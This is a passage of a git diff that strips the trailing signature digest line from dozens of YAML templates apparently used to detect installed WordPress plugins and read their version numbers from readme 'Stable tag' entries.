4a0a004730450220796455d2a858413988493ce428db88ca25ec8b754bf1e2180a5a40806917ae1e022100a986d292178ce7da30b51a6baf48d068719cd1714ef7894d65e980378280dc67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ccc7080b92..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab9efc94f98a339c2fe4c187331647c198dfeeba10d30fcf926b5c0c6e0116f4022100ad6a128ff19dd24bf468836c52e41e37fb3537a8dc2674416c61dcf9ebf63fa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index f3d0269946..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c380ed8834ee7edbf11fde34d38b250649c172caf04ac01e59cb45ee8dff06d0220273fef24e3001f2139e962eeb405d03aa77865fef6b43868c4e4a809f6ae6015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 2430e9479d..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d42498d4e29f9c7ca6a13848a2aa8f10491f910e4f33ee6cd3ed56540834e6702210099dd29bd24cb25b62ab934364776f3ca62c2035ed6865158a0f6b071bd1f4350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 50c96a0ac2..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e02cb8346805bf4d1b71e9ba15a9c372cce2e05548cb0fcbccada0c5088d2d502200c5e067ae998c53e47e85b63e029b716f294d142f3a0bf4808b5235c659cdea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 9113c46d7d..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2c7241470059a57a965ee45ffcb2bd082b25f7ccc0231814e33bbe50b6f1b9a022100d5f34ae8e8d00f72d4059106cf9db8733e698ccdba2027758c5db2cefbd2e182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 783daef6c1..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7bc9b7f9e0586571d20d07c7e3d3aebcf869f91c0a871f95ad7511f2f5723a702202c6bbe1b18b358918d1fd6e853ed91d0e06bcba926f72bef3a56e0215624a7a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1de52b49bf..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009001d3a2e4daa1c9e80808af47ae4183b7f2a27311af1d02f644ab5b79d990c3022100e096c40d9bae7df4128f361a59d331eca016ab2ae779236882991d0ee0cd4847:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 8a63660322..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d155f44d90fc5acce2e74209230a82e3f6f6e328f366f62a067427f71fb1a9c022100dac9185706eed328508168d912cc4516e41e39d540da3d3179fe61768df01f21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 9eded31576..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220608d1e2a5dcd1ec26260e3067ac7ebfa2a13865da58c070aad4052372095045a02203df53202ce6de532052d6de784829b31965674bc832ab1f6aaeb0f5ddcca5e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 1785108bd6..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022018df79e368a899dd94862eb8999aab2ae108121b9cfa27a16e82c16d771ea7c802204419c288af85ba393a77afde77aeadb97d901d0be8ea45f78eb7b6001a32b222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c5253d0d45..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ab5eb2eee2f22dca74240312465d4feed601e2c5d7e37e893819bcdf2f2540d02204b22d751cdeeb663fba8bebaefa9d995ca96bb75078bdb3f6458b70399da8384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 03a554d72e..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008fc7a205d43c048bae2a90c6c77b150c9828912d07f7d12c9123ea169c466b34022100f52f1b9b426ca0dbdf54f62e9fc7dc93cbdde01fce31e2296f3089cc387ba0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 6d95bfa996..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ff8a106a5671b4617e4ef9af5cfb336a9183aa6bec8d0b0d0a02a9df6d4cabb0220469b6742a1144bf740fde0b4b85fdb6a8eb151d70d23e9fecbe6a4c08c28928b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 3378038b6f..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039744b090361dc6bd0c23f60d8a125f249f2b25cefb3d79843c4a95b218fcd1e022014d4f20686fbae2f741913dd7cc8091f2a9668a3cd7d932e1d293d5b414efacd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 6051f0a6be..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204891648285c01c7a769928aa38bbf2ac52295bb5f425b707d752030b1dbd48d3022100a9d8ec1f2620be2dab11b438909733e078c97a27b3483fcca158ccda01025cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index aa962bdd81..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205390c7386599d541d11079119479f593dbcda114fcabe82c963e80b4bf2c5e1a022100b2a77db87b83a9d68855645a32dc633b589a9bb4859e2d4214a8365bdfb3fafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 0b1af47ac9..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071ec30396a3129fc00abbd5ff208b334ca07f8af6316990c24b25ef6145129f202207fcbf5656af6a743d825f862bd51a464c4096c04ca40d49f26fbbc7e2d3e305b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 7a8f26bee0..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b621c155d70fed57de7babeb0256e4a5a7eb4e00f1bc1334f654d902ed9b89302200fe52b8f0dd98b448854ece449e63fe8704ffbd26e6321028b6da1b4c2a35d30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 1a499d0826..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3e57f210b746191bfb045f586a597518d4b42eb37a9c1a86ad0ab1071534135022100fe68e826fcd988562a9fcb46aad5a618fec13cdcde991673b239b1c85ee58049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index a8fa946525..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097583d480afca357d038cfd614fbc9a62be602685a90c3f50cfc8a272f228a2a022046776e2d83acf98956d3cd2f21ff0926d7007d36b5d51b3be23235664deb89e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 67123d071e..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e51e3e164541be9533dbfa3c16577fffab477669d3ab52753f587bd55cc915a102200c1183a98532326d8780dc9f83e3018e7e1da70292d302a9f4885b4e730b5f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 57aae9f70f..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f209e986acb6b2906cce7e14eea508022b107e548ae62ddd4e147b1649ba46cd022100c5994a29ec0e07982a379f7d954bc0c27d6158d5d932f1b0d88ac605c3fe17d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 92c47c987f..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204aa0c1262c15c4e0f66b8f2e7ef694fe15290c68c92a3208deecbb2f4c066740022100f5b6548c716011d935d793e2f100667e84dff6e331a497e7c1d398052043b5ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 4ccac3cbac..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e980d97775e856875fffd7cb4e296922cb2f32071213348af5c67f938d1f88d202206545002d79d49cfbd819eb832d8095e58a678a30f6734abbc203f1539bc24dce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index f3fbe92e51..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202596d45b059302e95f1f536aa712f3bfbe6be86edf145c3e1f7f0820485a667402210087b00adc8e89cd99539041c63d20eff31dc9cdfb0a955ec7f81534bc58bc3b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index d162299f77..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e5b18986fcfbf84bb08cd99b3183906c4697cc533ab00c2a230d0fe6a7eb521022100a6684bcf83c2229a042a5016df70bf987e1da89728624fc4426c5bfe33a9c165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index ea0e6f14ad..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200388d74880f23d041cbb93c238f8bbf6c1bfa4fedebe53060dd7f5022cd493a5022100db4d045dbc316fdf4ceb8b8c9645ee184fd39396ce392099d24bda412d7bc917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index ea25e57680..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef0b41224585d4638781de43a2de2027434e2e5ef1ba0d6d8f5a991ce98bb0c402202a88328b52591c1609a644310a5ca0c3630d062a5614f59955d2dafd8c83c475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 7f4e521ea1..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204387cb61e48dc8126374012ea63c37e0f5cb050f40f87c48ebde4f8ad1c91ef3022049a662c3be31d08a04a17bc92eb25b5a0f8261fd18335f16b670d5cf08f01028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index d16c931621..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f78ee94de4cabd1271c29191691b385a526f09d5ba16ec7274aa4fa161dca073022100d23263c57b9a647d5b976f52bd529be221782b92af998f944a847fdb251b58f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7fe224ce46..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df62a8b38ce5bec8793c4a0c865eb2f6ef93057dd467a6ed4fe1051df8651bed02205a306e269ddee16e279978d50b9d4990f47a1fb9e10b777749be2176660bafd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index dc89ee7218..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a2e6ff068dafa09759d477c3cba8424e2864c25473dd65c869d70e516ded35a022100abce407a6043e05c53daaa673fdb4a2b51a34e3a2d28978d135a01aa26686432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 03f974a6c2..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b9647dc58f589a31452b86329dfb308526239519a47e9936667af986845c3ce0220521c334192b29f03ada520c9c363187c3fbab7cb670cf1e239758029df11884b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 742801b909..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009284df6b5114e8267390797d5ab4452ecb54be5490fc0ba8be4bf30e4e7bc6b8022017b165734fe473f99513046cd376be9738c51e1eba1ac395662d047399c11705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index c814aac807..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205283270226596da049cff293f3866341df2a284a82d49b222985202df6652fba022059b2901c0519282dea564e6daa5af73721872ed7e81f0cca645568d343016e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 65c218bc2f..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b2cb1b791b9aefef329aa3f663dfde9dba2fd19ce7da03fcc40b2f8ee287966102203a987d857d2a2cf4e131bd09e7c78126955ec7a082ea828f0410c75ad7dcb74f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 0855e4ff8c..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038ed80da315806603c0d8c61697be19fa1f7dd3235693c14e13a19effa217679022100f32ef25aef855619a3f0754d077ccba03922300397d85f5b683f728bd67771c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 85ba9cf876..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d6064617b58c3cf378eab666b9e93f2c2cc64f4baf8bcc71bed20fa6bb5ef4602206fdf4d93667e0dbcfb79f86570adfd6011d982efc535b85d69f2b9254eb7cd16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 7e13f43caa..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6538d0597ccf9b6b8fb491cb08c88fd7b3d8807dd3ba4d7cdfceac84838e181022100ef4a657e380b293a1ccf2f0602ba62b6b5ad8423788a4de738c468d91d99bb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b557f3dfea..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe14ae993083769b456d2379fa59049ddab4a63c06c35f30618d3e7fa68cc0cf02210096726782e3e73ed61cef1b74a08e5481a6e9993b76109fc57ee65a1eef619531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index e4b33402dc..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f27b9fc98635b4192d9672ca68c840874a3a8d313cbffacb16b58fe52f5548d022100cf254dffaac2cde7efc5d5b6eef22f402e92828c57e94892c7ed9daa0320fb85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 583ef66909..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203890e8857fe587fe636234043d4e13bc9d5cb8e32e8cff0ee82ca17a1e35efe502206cab840d14881c839c3fe4930788656b5d86584046a7bb483002820edf3c4fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f2d62dc36d..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d53fc1b5f0c164f0549dcd80df48f8c2e613f189f704dfefd6f01c9ead99fff02210088438a5676baa1c1c0932dfcf88558dfb720abcc6d77cd8779956f5bce55eb4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index b974d96abf..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d3f4e423ef03bc803879b24d3bcae4df20deb6168d4a1cdd3caa9865c730d180220060a70f82dc001816ff017241aa94b79b66a60753031435a3d252f58dc789c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index c3910e218d..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bf4599f4235cbfe3a826eecd1c403e3429927cade9c31727b83ddfaa5626a6f022100f19fedaa62e3f99a63ffe00b68d9bb4355b5ddd197f268ac70d7b4ed651e13bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index a89e00e5c8..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084a81d550b427e171d706c983c8daba97f3d00d1cfa0adcf9827c56fc5a3b8f1022100bfb754f6e683b586f5655cf706b8d93642c02466610efa822d858598be636910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 3575d97386..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 